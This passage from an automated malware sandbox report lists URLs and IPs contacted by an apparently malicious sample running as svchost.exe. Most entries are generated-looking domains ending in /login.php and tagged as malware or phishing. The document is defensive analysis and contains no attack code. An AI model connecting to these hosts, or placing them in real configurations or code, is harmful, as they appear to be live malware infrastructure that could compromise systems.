                                                                                                                                                                                                              http://lymyxex.com/login.phpsvchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://cdn.ampproject.orgsvchost.exe, 00000002.00000003.3279033707.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649333466.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2343646996.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310750407.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2291219253.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346790386.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347416587.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2637865779.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2343198568.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://lysysyx.com/login.phpsvchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://volyjif.com/login.phpsvchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376002854.000000000923B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://vonypic.com/login.phpsvchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2365866545.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2852112632.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373591398.00000000092B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://puzyxip.com/login.phpsvchost.exe, 00000002.00000003.2757808782.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363891080.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364207806.0000000000852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://vofydak.com/login.phpsvchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377062429.0000000003357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://pumyxiv.com/login.phpsvchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2386784820.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2385120826.00000000033EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2649196751.00000000091F7000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D72000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.0000000008682000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093A5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://qedysyp.com/login.phpsvchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: phishing
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://gahyvuh.com/login.phpsvchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://puzyduq.com/login.phpsvchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://puzydal.com/login.phpsvchost.exe, 00000002.00000003.2509683984.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322419492.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527939785.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2523187509.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2512099666.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506997946.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2314873415.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322755404.00000000092B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://qegyhig.com/login.phpYsvchost.exe, 00000002.00000003.2223016601.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://lyxysad.com/login.phpsvchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360864557.0000000003331000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2757808782.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2849292157.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361263640.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2725544478.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://106.15.232.163/Hsvchost.exe, 00000002.00000003.2427508592.00000000092AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://gahyhys.com/login.phpsvchost.exe, 00000002.00000003.2637865779.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://purywyl.com/login.phpsvchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://lykyjad.com/login.phpsvchost.exe, 00000002.00000003.2396904091.000000000331D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2427094852.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387196147.000000000331C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2385326544.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2572564754.0000000000FB2000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.0000000001555000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.00000000013B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://vojyzik.com/login.phpsvchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361263640.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2361214474.0000000003356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746888339.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2829874698.000000000084D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://www.google.comtK6svchost.exe, 00000002.00000003.2332355296.0000000009364000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359070684.0000000009360000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://vojycec.com/login.phpsvchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://gatyfus.com/login.phpsvchost.exe, 00000002.00000003.2223016601.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381751568.0000000003331000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184899677.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2207439218.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2185076169.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384537956.0000000003331000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E20000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2613849314.0000000000F68000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://galyfis.com/svchost.exe, 00000002.00000003.2347539212.0000000003309000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  http://lymymax.com/Hsvchost.exe, 00000002.00000003.2667584330.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2694181112.00000000040F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  http://volydot.com/login.phpsvchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2512566471.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2530302930.00000000092C9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: phishing
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  http://lyryvur.com/login.phpsvchost.exe, 00000002.00000003.2344956997.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332264267.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344054756.0000000003378000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  http://pujygug.com/login.phpsvchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                                                  		unknown

                                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                  3.94.10.34
                                                                                                                                                                                                                  		lygynud.comUnited States
                                                                                                                                                                                                                  		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                  64.190.63.136
                                                                                                                                                                                                                  		www.sedoparking.comUnited States
                                                                                                                                                                                                                  		11696NBS11696USfalse
                                                                                                                                                                                                                  106.15.232.163
                                                                                                                                                                                                                  		unknownChina
                                                                                                                                                                                                                  		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                                                                                                                                                                  72.52.179.174
                                                                                                                                                                                                                  		pltraffic7.comUnited States
                                                                                                                                                                                                                  		32244LIQUIDWEBUSfalse
                                                                                                                                                                                                                  45.79.19.196
                                                                                                                                                                                                                  		deliver.trafficmotor.comUnited States
                                                                                                                                                                                                                  		63949LINODE-APLinodeLLCUStrue
